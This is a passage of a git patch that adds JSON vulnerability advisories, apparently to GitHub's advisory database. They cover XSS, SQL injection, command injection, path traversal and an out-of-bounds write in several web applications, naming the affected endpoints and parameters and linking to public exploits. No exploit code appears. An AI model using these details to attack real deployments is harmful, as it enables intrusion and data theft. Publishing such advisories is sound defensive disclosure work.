advisories/unreviewed/2026/02/GHSA-7p2j-mg94-f4j6/GHSA-7p2j-mg94-f4j6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cv79-qfjv-wpvr/GHSA-cv79-qfjv-wpvr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qqmj-6rm4-v4q6/GHSA-qqmj-6rm4-v4q6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wh45-rv58-w5rc/GHSA-wh45-rv58-w5rc.json diff --git a/advisories/unreviewed/2026/02/GHSA-7p2j-mg94-f4j6/GHSA-7p2j-mg94-f4j6.json b/advisories/unreviewed/2026/02/GHSA-7p2j-mg94-f4j6/GHSA-7p2j-mg94-f4j6.json new file mode 100644 index 0000000000000..eb2fe759a4315 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7p2j-mg94-f4j6/GHSA-7p2j-mg94-f4j6.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7p2j-mg94-f4j6", + "modified": "2026-02-22T12:30:26Z", + "published": "2026-02-22T12:30:26Z", + "aliases": [ + "CVE-2026-2939" + ], + "details": "A vulnerability was found in itsourcecode Student Management System 1.0. The impacted element is an unknown function of the file /add_student/ of the component Add Student Module. The manipulation results in cross site scripting. It is possible to launch the attack remotely. The exploit has been made public and could be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2939" + }, + { + "type": "WEB", + "url": "https://drive.google.com/file/d/1a-qY55pgynQviBw9UxPoIDs-UNgz6zOH/view" + }, + { + "type": "WEB", + "url": "https://github.com/AS-AbdulSamad/CVE-1/tree/main" + }, + { + "type": "WEB", + "url": "https://itsourcecode.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347311" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347311" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755977" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T10:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cv79-qfjv-wpvr/GHSA-cv79-qfjv-wpvr.json b/advisories/unreviewed/2026/02/GHSA-cv79-qfjv-wpvr/GHSA-cv79-qfjv-wpvr.json new file mode 100644 index 0000000000000..30fe44e6dc033 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cv79-qfjv-wpvr/GHSA-cv79-qfjv-wpvr.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cv79-qfjv-wpvr", + "modified": "2026-02-22T12:30:26Z", + "published": "2026-02-22T12:30:26Z", + "aliases": [ + "CVE-2026-2940" + ], + "details": "A vulnerability was determined in Zaher1307 tiny_web_server up to 8d77b1044a0ca3a5297d8726ac8aa2cf944d481b. This affects the function tiny_web_server/tiny.c of the file tiny_web_server/tiny.c of the component URL Handler. This manipulation causes out-of-bounds write. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2940" + }, + { + "type": "WEB", + "url": "https://github.com/Zaher1307/tiny_web_server/issues/1" + }, + { + "type": "WEB", + "url": "https://github.com/Zaher1307/tiny_web_server/issues/1#issue-3924357507" + }, + { + "type": "WEB", + "url": "https://github.com/Zaher1307/tiny_web_server" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347312" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347312" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756036" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T10:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qqmj-6rm4-v4q6/GHSA-qqmj-6rm4-v4q6.json b/advisories/unreviewed/2026/02/GHSA-qqmj-6rm4-v4q6/GHSA-qqmj-6rm4-v4q6.json new file mode 100644 index 0000000000000..c6ce3d3ac6f82 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qqmj-6rm4-v4q6/GHSA-qqmj-6rm4-v4q6.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qqmj-6rm4-v4q6", + "modified": "2026-02-22T12:30:26Z", + "published": "2026-02-22T12:30:26Z", + "aliases": [ + "CVE-2026-2943" + ], + "details": "A vulnerability was identified in SapneshNaik Student Management System up to f4b4f0928f0b5551a28ee81ae7e7fe47d9345318. This impacts an unknown function of the file index.php. Such manipulation of the argument Error leads to cross site scripting. The attack can be launched remotely. The exploit is publicly available and might be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2943" + }, + { + "type": "WEB", + "url": "https://github.com/duckpigdog/CVE/blob/main/XSS%E2%80%94%E2%80%94SapneshNaik_Student-Management-System.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347313" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347313" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754035" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T11:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wh45-rv58-w5rc/GHSA-wh45-rv58-w5rc.json b/advisories/unreviewed/2026/02/GHSA-wh45-rv58-w5rc/GHSA-wh45-rv58-w5rc.json new file mode 100644 index 0000000000000..fdd3d10cd0fee --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wh45-rv58-w5rc/GHSA-wh45-rv58-w5rc.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wh45-rv58-w5rc", + "modified": "2026-02-22T12:30:26Z", + "published": "2026-02-22T12:30:26Z", + "aliases": [ + "CVE-2026-2944" + ], + "details": "A security flaw has been discovered in Tosei Online Store Management System ネット店舗管理システム 1.01. Affected is the function system of the file /cgi-bin/monitor.php of the component HTTP POST Request Handler. Performing a manipulation of the argument DevId results in os command injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2944" + }, + { + "type": "WEB", + "url": "https://github.com/CVE-Hunter-Leo/CVE/issues/9" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347314" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347314" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754579" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T11:16:13Z" + } +} \ No newline at end of file From a53df6ebff933488a09834c893173e3c74b8beec Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 22 Feb 2026 15:31:48 +0000 Subject: [PATCH 45/77] Publish Advisories GHSA-22mj-mcf8-h63q GHSA-2r55-mr9c-c89p GHSA-2r9c-63hg-4rg2 GHSA-3f9r-87f6-jmr2 GHSA-46jj-7w5w-vccv GHSA-5fc6-42f5-w7cm GHSA-5qxq-p7xm-75w5 GHSA-5v2q-744p-wj8v GHSA-85vj-mhr5-mmvc GHSA-87vp-v5jj-xmcq GHSA-8v8j-49p6-4ccp GHSA-96mq-76jj-h8p9 GHSA-982r-pxpw-xv2x GHSA-9fcj-8w2v-j38f GHSA-9pg8-c68j-285r GHSA-ff6v-wx52-q8j8 GHSA-fw7r-mghm-mcfw GHSA-fwf8-cx3q-ch9g GHSA-jcj5-xf7h-rwx7 GHSA-jfw2-q9rx-mg64 GHSA-q2p9-fpj7-9fjp GHSA-qx92-pw43-vf25 GHSA-w7wm-w9qw-pc72 GHSA-wf2x-4p8v-p7m6 --- .../GHSA-22mj-mcf8-h63q.json | 48 +++++++++++++++++ .../GHSA-2r55-mr9c-c89p.json | 44 ++++++++++++++++ .../GHSA-2r9c-63hg-4rg2.json | 44 ++++++++++++++++ .../GHSA-3f9r-87f6-jmr2.json | 44 ++++++++++++++++ .../GHSA-46jj-7w5w-vccv.json | 48 +++++++++++++++++ .../GHSA-5fc6-42f5-w7cm.json | 44 ++++++++++++++++ .../GHSA-5qxq-p7xm-75w5.json | 52 +++++++++++++++++++ .../GHSA-5v2q-744p-wj8v.json | 52 +++++++++++++++++++ .../GHSA-85vj-mhr5-mmvc.json | 52 +++++++++++++++++++ .../GHSA-87vp-v5jj-xmcq.json | 48 +++++++++++++++++ .../GHSA-8v8j-49p6-4ccp.json | 48 +++++++++++++++++ .../GHSA-96mq-76jj-h8p9.json | 52 +++++++++++++++++++ .../GHSA-982r-pxpw-xv2x.json | 48 +++++++++++++++++ .../GHSA-9fcj-8w2v-j38f.json | 52 +++++++++++++++++++ .../GHSA-9pg8-c68j-285r.json | 44 ++++++++++++++++ .../GHSA-ff6v-wx52-q8j8.json | 44 ++++++++++++++++ .../GHSA-fw7r-mghm-mcfw.json | 44 ++++++++++++++++ .../GHSA-fwf8-cx3q-ch9g.json | 52 +++++++++++++++++++ .../GHSA-jcj5-xf7h-rwx7.json | 44 ++++++++++++++++ .../GHSA-jfw2-q9rx-mg64.json | 48 +++++++++++++++++ .../GHSA-q2p9-fpj7-9fjp.json | 48 +++++++++++++++++ .../GHSA-qx92-pw43-vf25.json | 48 +++++++++++++++++ .../GHSA-w7wm-w9qw-pc72.json | 48 +++++++++++++++++ .../GHSA-wf2x-4p8v-p7m6.json | 48 +++++++++++++++++ 24 files changed, 1144 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-22mj-mcf8-h63q/GHSA-22mj-mcf8-h63q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2r55-mr9c-c89p/GHSA-2r55-mr9c-c89p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2r9c-63hg-4rg2/GHSA-2r9c-63hg-4rg2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3f9r-87f6-jmr2/GHSA-3f9r-87f6-jmr2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-46jj-7w5w-vccv/GHSA-46jj-7w5w-vccv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5fc6-42f5-w7cm/GHSA-5fc6-42f5-w7cm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5qxq-p7xm-75w5/GHSA-5qxq-p7xm-75w5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5v2q-744p-wj8v/GHSA-5v2q-744p-wj8v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-85vj-mhr5-mmvc/GHSA-85vj-mhr5-mmvc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-87vp-v5jj-xmcq/GHSA-87vp-v5jj-xmcq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8v8j-49p6-4ccp/GHSA-8v8j-49p6-4ccp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-96mq-76jj-h8p9/GHSA-96mq-76jj-h8p9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-982r-pxpw-xv2x/GHSA-982r-pxpw-xv2x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9fcj-8w2v-j38f/GHSA-9fcj-8w2v-j38f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9pg8-c68j-285r/GHSA-9pg8-c68j-285r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ff6v-wx52-q8j8/GHSA-ff6v-wx52-q8j8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fw7r-mghm-mcfw/GHSA-fw7r-mghm-mcfw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fwf8-cx3q-ch9g/GHSA-fwf8-cx3q-ch9g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jcj5-xf7h-rwx7/GHSA-jcj5-xf7h-rwx7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jfw2-q9rx-mg64/GHSA-jfw2-q9rx-mg64.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q2p9-fpj7-9fjp/GHSA-q2p9-fpj7-9fjp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qx92-pw43-vf25/GHSA-qx92-pw43-vf25.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w7wm-w9qw-pc72/GHSA-w7wm-w9qw-pc72.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wf2x-4p8v-p7m6/GHSA-wf2x-4p8v-p7m6.json diff --git a/advisories/unreviewed/2026/02/GHSA-22mj-mcf8-h63q/GHSA-22mj-mcf8-h63q.json b/advisories/unreviewed/2026/02/GHSA-22mj-mcf8-h63q/GHSA-22mj-mcf8-h63q.json new file mode 100644 index 0000000000000..40471c0cd6736 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-22mj-mcf8-h63q/GHSA-22mj-mcf8-h63q.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-22mj-mcf8-h63q", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25455" + ], + "details": "Web Ofisi E-Ticaret v3 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'a' parameter. Attackers can send GET requests to with malicious 'a' parameter values to extract sensitive database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25455" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47139" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-e-ticaret-sql-injection-via-arahtml" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/e-ticaret-v3-sanal-pos.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2r55-mr9c-c89p/GHSA-2r55-mr9c-c89p.json b/advisories/unreviewed/2026/02/GHSA-2r55-mr9c-c89p/GHSA-2r55-mr9c-c89p.json new file mode 100644 index 0000000000000..152c20860041b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2r55-mr9c-c89p/GHSA-2r55-mr9c-c89p.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2r55-mr9c-c89p", + "modified": "2026-02-22T15:30:14Z", + "published": "2026-02-22T15:30:14Z", + "aliases": [ + "CVE-2019-25439" + ], + "details": "NoviSmart CMS contains an SQL injection vulnerability that allows remote attackers to execute arbitrary SQL queries by injecting malicious code through the Referer HTTP header field. Attackers can craft requests with time-based SQL injection payloads in the Referer header to extract sensitive database information or cause denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25439" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47152" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/novismart-cms-sql-injection-via-referer-http-header" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2r9c-63hg-4rg2/GHSA-2r9c-63hg-4rg2.json b/advisories/unreviewed/2026/02/GHSA-2r9c-63hg-4rg2/GHSA-2r9c-63hg-4rg2.json new file mode 100644 index 0000000000000..746d8ed08e001 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2r9c-63hg-4rg2/GHSA-2r9c-63hg-4rg2.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2r9c-63hg-4rg2", + "modified": "2026-02-22T15:30:14Z", + "published": "2026-02-22T15:30:14Z", + "aliases": [ + "CVE-2019-25446" + ], + "details": "DIGIT CENTRIS ERP contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the datum1, datum2, KID, and PID parameters. Attackers can send POST requests to /korisnikinfo.php with malicious SQL syntax in these parameters to extract or modify sensitive database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25446" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47401" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/digit-centris-erp-every-version-sql-injection-via-datum-parameter" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3f9r-87f6-jmr2/GHSA-3f9r-87f6-jmr2.json b/advisories/unreviewed/2026/02/GHSA-3f9r-87f6-jmr2/GHSA-3f9r-87f6-jmr2.json new file mode 100644 index 0000000000000..0f7520a6f6a29 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3f9r-87f6-jmr2/GHSA-3f9r-87f6-jmr2.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3f9r-87f6-jmr2", + "modified": "2026-02-22T15:30:13Z", + "published": "2026-02-22T15:30:13Z", + "aliases": [ + "CVE-2019-25391" + ], + "details": "Ashop Shopping Cart Software contains a time-based blind SQL injection vulnerability that allows attackers to manipulate database queries through the blacklistitemid parameter. Attackers can send POST requests to the admin/bannedcustomers.php endpoint with crafted SQL payloads using SLEEP functions to extract sensitive database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25391" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46681" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ashop-shopping-cart-software-lastest-latest-sql-injection-via-bannedcustomersphp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-46jj-7w5w-vccv/GHSA-46jj-7w5w-vccv.json b/advisories/unreviewed/2026/02/GHSA-46jj-7w5w-vccv/GHSA-46jj-7w5w-vccv.json new file mode 100644 index 0000000000000..6525078036031 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-46jj-7w5w-vccv/GHSA-46jj-7w5w-vccv.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-46jj-7w5w-vccv", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25462" + ], + "details": "Web Ofisi Rent a Car v3 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'klima' parameter. Attackers can send GET requests to with malicious 'klima' values to extract sensitive database information or cause denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25462" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47144" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-rent-a-car-sql-injection-via-klima-parameter" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/rent-a-car-v3.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5fc6-42f5-w7cm/GHSA-5fc6-42f5-w7cm.json b/advisories/unreviewed/2026/02/GHSA-5fc6-42f5-w7cm/GHSA-5fc6-42f5-w7cm.json new file mode 100644 index 0000000000000..c64a22f72b79e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5fc6-42f5-w7cm/GHSA-5fc6-42f5-w7cm.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5fc6-42f5-w7cm", + "modified": "2026-02-22T15:30:14Z", + "published": "2026-02-22T15:30:14Z", + "aliases": [ + "CVE-2019-25450" + ], + "details": "Dolibarr ERP/CRM 10.0.1 contains multiple SQL injection vulnerabilities that allow authenticated attackers to manipulate database queries by injecting SQL code through POST parameters. Attackers can inject malicious SQL through parameters like actioncode, demand_reason_id, and availability_id in card.php endpoints to extract sensitive database information using boolean-based blind, error-based, and time-based blind techniques.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25450" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47370" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/dolibarr-erpcrm-sql-injection-via-cardphp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5qxq-p7xm-75w5/GHSA-5qxq-p7xm-75w5.json b/advisories/unreviewed/2026/02/GHSA-5qxq-p7xm-75w5/GHSA-5qxq-p7xm-75w5.json new file mode 100644 index 0000000000000..7cd2c593b7088 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5qxq-p7xm-75w5/GHSA-5qxq-p7xm-75w5.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5qxq-p7xm-75w5", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2026-2953" + ], + "details": "A vulnerability has been found in Dromara UJCMS 101.2. This issue affects the function deleteDirectory of the file WebFileTemplateController.delete of the component Template Handler. Such manipulation leads to path traversal. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2953" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347319" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347319" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755215" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/la12138/pa2fpb/lxngf3d07uyd0nwp?singleDoc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5v2q-744p-wj8v/GHSA-5v2q-744p-wj8v.json b/advisories/unreviewed/2026/02/GHSA-5v2q-744p-wj8v/GHSA-5v2q-744p-wj8v.json new file mode 100644 index 0000000000000..b184a7635a58a --- /dev/null +++ 